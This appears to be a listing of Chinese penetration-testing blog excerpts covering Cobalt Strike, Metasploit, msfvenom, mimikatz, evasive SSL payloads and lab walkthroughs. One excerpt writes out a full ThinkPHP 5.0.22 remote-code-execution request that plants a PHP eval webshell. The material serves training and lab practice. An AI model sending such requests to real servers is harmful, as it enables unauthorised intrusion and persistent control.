• 2024-05-29CS配合MSF互传权限 以及使用mimikatz抓取明文密码
    cobaltstrike与metasploit互传权限1.cobalt传递权限给msf启动server端./teamserver[监听地址][密码]使用客户端连接:生成一个监听器在5555端口服务端上监听生成后门可以选择以上几种选择interact模块进行利用先生成一个外部http监听器这里填写msf主机所监
  • 2024-03-04红日靶场01多角度打靶笔记
    红日靶场01这个笔记主要是利用这个靶场环境,对内网渗透的思路进行整合一下,因此过程中会涉及多个攻击方式和思路。环境搭建windows7是靶机01Windowsserver2008R2是靶机02Windowsserver2003是靶机03Windows10是攻击01kali是攻击02(cs服务端和msf都在上面)这个靶
  • 2023-12-10tryhackme进攻性渗透测试-Advanced Exploitation 高级利用
    SteelMountain侦察Nmap-sC-sV-O$IP-oNbasic_scan.nmapNmap-script=vuln$IP-oNvuln_scan.nmap总之,masscan在eth0上工作,所以SYN端口探测技术全部没有响应包需要一个flag把探测流量正确的打入tun0中masscan-p808010.10.205.233-etun0nmap除了使用SYN端口
  • 2023-12-07【THM】Metasploit:操作
    简介在本文中,我们将学习如何使用Metasploit进行漏洞扫描和漏洞利用。我们还将介绍数据库特性是如何使管理更广泛的渗透测试项目变得更加容易的。最后,我们将研究如何使用msfvenom生成有效载荷,以及如何在大多数目标平台上启动Meterpreter会话。更具体地说,我们将讨论的主题是
  • 2023-10-16MSFvenom恶意程序生成与利用
    MSFvenom1.1MSFvenom介绍MSFvenom是Msfpayload和Msfencode的组合,可以生成各种攻击载荷,并且可以对载荷进行编码。做渗透测试时往往需要将有效负载部署在目标系统上,而msfvenom可以快速创建符合靶机的载荷,Msfvenom包含标准的命令行选项。可以为许多平台生成有效负载,如Android,Win
  • 2023-10-01MSF恶意程序利用【实战】
    ★关于道德伦理的忠告★关于一些网络安全实战内容,我还是不厌其烦的写上这些忠告,请见谅。以下内容摘自《Metasploit渗透测试指南》作为一名渗透测试者,我们可以击败安全防御机制,但这是仅仅是我们工作的一部分。当你进行渗透攻击时,请记住如下的忠告:不要进行恶意的攻击;不要
  • 2023-09-25Metasploit Framework
    简介目前最流行、最强大、最具扩展性的渗透测试平台软件基于Metasploit进行渗透测试和漏洞分析的流程和方法2003年由HDMore发布第一版,2007年用ruby语言重写框架集成了渗透测试标准(PETS)思想一定程度上统一了渗透测试和漏洞研究的工作环境新的攻击代码可以比较容易的
  • 2023-07-011.3 Metasploit 生成SSL加密载荷
    在本节中,我们将介绍如何通过使用Metasploit生成加密载荷,以隐藏网络特征。前一章节我们已经通过Metasploit生成了一段明文的ShellCode,但明文的网络传输存在安全隐患,因此本节将介绍如何通过生成SSL证书来加密ShellCode,使得网络特征得到隐藏,从而提高后门的生存能力和抵抗网络特征分析
  • 2023-07-011.3 Metasploit 生成SSL加密载荷
    在本节中,我们将介绍如何通过使用Metasploit生成加密载荷,以隐藏网络特征。前一章节我们已经通过Metasploit生成了一段明文的ShellCode,但明文的网络传输存在安全隐患,因此本节将介绍如何通过生成SSL证书来加密ShellCode,使得网络特征得到隐藏,从而提高后门的生存能力和抵抗网络特征分析
  • 2023-05-30记一次靶场渗透
    外围突破thinkphp5.0.22GET/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=bak.php&vars[1][]=%3C%3Fphp+%40eval%28%24_POST%5B%27code%27%5D%29%3BHTTP/1.1User-Agent:Mozilla/5.
  • 2023-05-25《MS17-010(永恒之蓝)—漏洞复现及防范》
    作者:susususuao免责声明:本文仅供学习研究,严禁从事非法活动,任何后果由使用者本人负责。一.什么是永恒之蓝?-永恒之蓝永恒之蓝(EternalBlue)是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。而SMB服务是一个协议名,它能被用于Web连接和客
  • 2023-04-10Vulnhub之Loly靶机详细测试过程(不同提权方法,利用metasploit工具)
    Loly识别目标主机IP地址─(kali㉿kali)-[~/Desktop/Vulnhub/Loly]└─$sudonetdiscover-ieth1-r192.168.56.0/24Currentlyscanning:192.168.56.0/24|ScreenView:UniqueHosts
  • 2023-01-27metasploit
    1.PortScanwithMetasploit$msfconsole msf6>searchportscan msf6>searchpath:portscanmsf6>searchtype:exploitmsf6>useauxiliary/scanner/portscan/s
  • 2023-01-10CobaltStrike会话管理
    cobaltstrike派生会话  派生会话可以通过自身增加会话或者在其他的teamserver做备份会话  在原有的监听器的基础上创建新的监听器        派生一个新的
  • 2022-11-30花生壳内网穿透&FRP
    花生壳内网穿透大致流程为:花生壳网站注册--->绑定本地内网主机--->配置映射外网的地址监听与本地主机映射的端口--->反弹shell1.在花生壳上配置好地址https://hsk.oray.
  • 2022-08-24msf基础
    msf中的模块:exploits,auxiliary,post,payloads,encoders,nops,evasionexploits:漏洞渗透模块。绝大多数人在发现漏洞之后,往往不知道接下来如何利用这个漏洞。漏洞模块本身就